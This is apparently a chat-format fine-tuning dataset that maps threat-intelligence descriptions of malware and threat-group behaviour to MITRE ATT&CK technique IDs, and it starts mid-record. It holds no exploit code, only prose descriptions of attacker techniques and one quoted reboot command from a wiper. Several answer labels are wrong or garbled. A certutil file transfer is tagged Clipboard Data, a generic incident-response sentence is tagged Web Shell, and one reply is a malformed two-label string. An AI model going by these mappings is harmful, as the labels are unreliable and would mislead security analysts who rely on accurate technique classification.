- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used HTTP and HTTPS for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including WMI and auto-run registry key. POWERTON typically gets deployed as a later stage backdoor and is obfuscated several layers"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire contains modules that can discover and exploit search order hijacking vulnerabilities."
- },
- {
- "role": "assistant",
- "content": "T1574.008 - Hijack Execution Flow: Path Interception by Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can use asynchronous procedure call (APC) injection to execute commands received from C2."
- },
- {
- "role": "assistant",
- "content": "T1055.004 - Process Injection: Asynchronous Procedure Call"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The back door Java file uses a custom class loader that loads encrypted class files (named Opcion[1-14]) as it receives commands from the RAT controller server. The key, specified by the attacker when creating the back door, is used to encrypt the class files using DES as a stream cipher"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Glimpse’s Agent Control Panel showing the interface actors would use to send commands The actor clicks the command to view the results in a popup window named “Result Viewer”"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Find-AVSignature AntivirusBypass module can be used to locate single byte anti-virus signatures."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InnaputRAT variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LaZagne can obtain credential information running Linux processes."
- },
- {
- "role": "assistant",
- "content": "T1003.007 - OS Credential Dumping: Proc Filesystem"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrackMapExec can enumerate the system drives and associated system name."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silent Librarian has collected lists of names for individuals from targeted organizations."
- },
- {
- "role": "assistant",
- "content": "T1589.003 - Employee Names"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The group's primary and likely proprietary RCSession RAT communicates with a hard-coded C2 server using a custom protocol over TCP port 443. After connecting to its C2 server, RCSession checks in with an encrypted beacon and then awaits instruction. The ORat tool, which appears to be used less frequently by the group, communicates over TCP port 80 using a raw socket protocol (not HTTP"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The task is used to start an IronPython script with the 64-bit version of the interpreter. However, the key didn’t decrypt on any of the embedded files in the scripts we found. The task’s description is PythonUpdateSrvc and it runs either on Windows startup when a user logs in or when one of two system events get created"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The \"ZR\" variant of BACKSPACE will check to see if known host-based firewalls are installed on the infected systems. BACKSPACE will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed."
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can use AES encryption for C2 data transferred."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The additional layer is position independent shellcode containing a reflective DLL loader. The loader decrypts an RC4 encrypted payload and loads it in memory. The code itself is a straight forward loader with the exception of some interesting artifacts identified during analysis."
- },
- {
- "role": "assistant",
- "content": "T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot has been known to use PowerShell to download new payloads, open documents, and upload data to command and control servers."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has established persistence by creating autostart extensibility point (ASEP) Registry entries in the Run key and other Registry keys, as well as by creating shortcuts in the Internet Explorer Quick Start folder."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sibot is a dual-purpose malware implemented in VBScript. It is designed to achieve persistence on the infected machine then download and execute a payload from a remote C2 server. The VBScript file is given a name that impersonates legitimate Windows tasks and is either stored in the registry of the compromised system or in an obfuscated format on disk"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Here is a list of the platforms used by this variant: Twitter, Yandex and Mediafire"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideTwist has used Base64 for encoded C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST was digitally signed by SolarWinds from March - May 2020."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dacls can use HTTPS in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can use token manipulation to bypass UAC on Windows7 systems."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Our latest Transparent Tribe research confirms that the group continues to create malicious domains mimicking defense-related entities as a core component of their operations. The victim is encouraged to click on an embedded URL hosted on sharingmymedia[.]com, which then downloads ObliqueRAT, the trojan discovered by Talos in 2020 associated with threat activity targeting entities in South Asia. We cannot confirm how the maldocs were delivered to victims, but we suspect they were probably sent as attachments to phishing emails based on previous threat actor behavior and the targeted nature of this particular lure. Security researchers previously discovered Transparent Tribe using sharingmymedia[.]com to host Android malware targeting Indian military and defense personnel.Figure 1: Maldoc masquerading as a congratulatory notice from CLAWS. In such cases, adversaries would deliver phishing maldocs to targets containing a malicious VBA macro that extracted either the CrimsonRAT executable or a ZIP archive embedded in the maldoc. The macro dropped the implant to the disk, setting up persistence mechanisms and eventually executing the payload on the infected endpoint. For example, attackers leveraging ObliqueRAT started hosting their malicious payloads on compromised websites instead of embedding the malware in the maldoc. Figure 2 shows the attackers' use of HTTrack, a free website copier program, to duplicate a legitimate website to use for their own malicious purposes. These examples highlight Transparent Tribe's heavy reliance on social engineering as a core TTP and the group's efforts to make their operations appear as legitimate as possible.Figure 2: Fake website cloned using HTTrack on May 29, 2020. The malicious domain prompts the victim to enter their name and email address to sign up and download a seemingly important \"guide on pay and allowance"
- },
- {
- "role": "assistant",
- "content": "T1608.004 - Drive-by Target"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use SSL and TLS for communications."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kinsing has communicated with C2 over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can user PowerView to execute “net user” commands and create domain accounts."
- },
- {
- "role": "assistant",
- "content": "T1136.002 - Create Account: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 19. Scrambling ‘Mac OSX 10.12’ Encryption The scrambled byte sequence is passed onto the constructor of the class Packet::Packet, which creates a random AES256 key and encrypts the buffer with this key"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang is known to use 7Zip and RAR with passwords to encrypt data prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Netwalker can use Windows API functions to inject the ransomware DLL."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can uninstall its loader through the use of a `Sdl` command."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gallmaker obfuscated shellcode used during execution."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While the decoy in Figure 2 is displayed, the macro will search the document for the delimiter ###$$$ and write the base64 encoded text that follows this delimiter to the file %APPDATA%\\Base.txt. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http://<c2 domain>/chk. hex(Environment.UserName/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan’s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http://<c2 domain>/what. hex(Environment.UserName/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can use custom shellcode to map embedded DLLs into memory."
- },
- {
- "role": "assistant",
- "content": "T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A custom executable that only contains the Metasploit shellcode. It is saved to C:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\msupdateconf.exe, granting the executable persistence. Another custom executable used to execute PowerShell scripts. The Mosquito JScript backdoor that uses Google Apps Script as its C&C server. Privilege escalation using the Metasploit module ext_server_priv.x86.dll [8"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLACKCOFFEE has the capability to create a reverse shell."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER malware has used HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "adds a .plist file to the /Library/LaunchAgents folder to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proton uses macOS' .command file type to script actions."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These keystrokes would run PowerShell commands that downloaded and installed various malware strains that acted as backdoors for the attackers into the victims’ networks"
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Uses the chmod +x command to grant executable permissions to the ransomware."
- },
- {
- "role": "assistant",
- "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HELLOKITTY can use WMI to delete volume shadow copies."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volexity has worked with multiple victim organizations to assist with incident response efforts and to remedy their compromised systems. This process lead to the identification of different ways the OceanLotus group gains access to the compromised websites and how they maintain access"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avenger has the ability to use Tasklist to identify running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors used certutil.exe, a known Living Off the Land\" technique, to transfer a file into a target environment.\""
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The part of the malicious code that drops and executes a payload is nearly identical between the two samples. The legitimate Windows executable C:\\Windows\\System32\\colorcpl.exe is copied to the new directory C:\\ProgramData\\PackageColor and the embedded payload is written to C:\\ProgramData\\PackageColor\\colorui.dll."
- },
- {
- "role": "assistant",
- "content": "T1218 - Signed Binary Proxy Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoomBox can search for specific files and directories on a machine."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems. [1] For information on vulnerabilities known to be exploited by Chinese statesponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources. Chinese state-sponsored cyber actors have also been observed: Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange® Outlook Web Access (OWA® ) and plant webshells. Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources. Deploying a public proof of concept (POC) exploit targeting a publicfacing appliance vulnerability."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "steals credentials from compromised hosts. 's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by include ones associated with The Bat!, Yahoo!, Mail.ru, Passport.Net, Google Talk, Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, Internet Explorer, Microsoft Outlook, WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP)."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used custom DNS Tunneling protocols for C2."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoxCaon established persistence by setting the \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" registry key to point to its executable."
- },
- {
- "role": "assistant",
- "content": "T1547 - Boot or Logon Autostart Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network and has also used TOR."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has disguised malicious template files as JPEG files to avoid detection."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has used PowerShell to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload file also checks for the Logmein event log in an attempt to encrypt files in remote machines or servers connected to the victim’s machine. The path to the log file is hard-coded in the payload file, as shown here"
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUPERNOVA is implemented as a modification to the existing ‘app_web_logoimagehandler.ashx.b6031896.dll’ module of the SolarWinds Orion application. The purpose of this module, in it’s legitimate form, is to return the logo image configured by the user to various web pages of the SolarWinds Orion web application. In legitimate operation, this class only contains the ProcessRequest() and LogoImageHandler() methods, a private static Log object, and public boolean parameter IsReusable"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 has used malware that will issue the command \"shutdown /r /t 1\" to reboot a system after wiping its MBR."
- },
- {
- "role": "assistant",
- "content": "T1529 - System Shutdown/Reboot"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hardcore Nationalist group SideWinder is a threat group active since 2012 according to Kaspersky. This group mainly targets Pakistanis and Chinese military & government entities’ windows machines. They also target mobile phone devices. This is the second time this group is using COVID-19 theme to lure victims, thereby capitalizing on the fear of global pandemic. Sidewinder aka HN2 is believed to be an Indian state sponsored group. A detailed analysis of SideWinder attacks on Pakistani military officials was also published in April"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File', 'T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It uses two components to avoid detection by a single component. The dropper uses an old trick in a new way: It appends the RAT to a Word document. Upon opening the document, a macro is executed that will extract the malware and execute it"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DEATHRANSOM can use public and private key pair encryption to encrypt files for ransom payment."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Appendix Malware Family Descriptions Malware Family Description Availability DROPSHOT Dropper that has been observed dropping and launching the TURNEDUP backdoor, as well as the SHAPESHIFT wiper malware Non-Public NANOCORE Publicly available remote access Trojan (RAT) available for purchase"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
